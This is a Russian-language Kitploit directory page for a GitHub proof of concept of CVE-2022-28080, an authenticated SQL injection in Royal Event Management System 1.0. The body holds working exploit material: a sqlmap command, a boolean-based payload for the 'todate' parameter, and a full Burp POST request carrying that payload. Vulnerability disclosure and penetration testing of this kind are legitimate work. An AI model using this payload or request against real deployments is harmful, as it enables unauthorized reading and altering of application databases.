Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Royal-Event-Management-System-todate-SQL-Injection-Authenticated — CVE-2022-28080 | Kitploit
Инструменты/GitHubGitHub/erengozaydin/royal-event-management-system-todate-sql-injection-authenticated
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHuberengozaydin/royal-event-management-system-todate-sql-injection-authenticated

Royal-Event-Management-System-todate-SQL-Injection-Authenticated

CVE-2022-28080

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
4 лет назадЕщё не проверено

Royal Event Management System - 'todate' SQL-инъекция (Аутентифицированный)

  1. Описание:

Royal Event Management System 1.0 позволяет выполнить SQL-инъекцию через параметр 'todate' в /royal_event/btndates_report.php#?=. Эксплуатация этой уязвимости может позволить злоумышленнику скомпрометировать приложение, получить доступ к данным или изменить их, или использовать скрытые уязвимости в базе данных.

  1. Подтверждение концепции:

В Burpsuite перехватите запрос с затронутой страницы с параметром 'todate' и сохраните его как poc.txt. Затем запустите SQLmap для извлечения данных из базы данных:

sqlmap -r poc.txt --dbms=mysql

  1. Пример полезной нагрузки:

(boolean-based)

-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

  1. Запрос Burpsuite:

POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"

-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"

3 --f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"

01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--

Скачать инструмент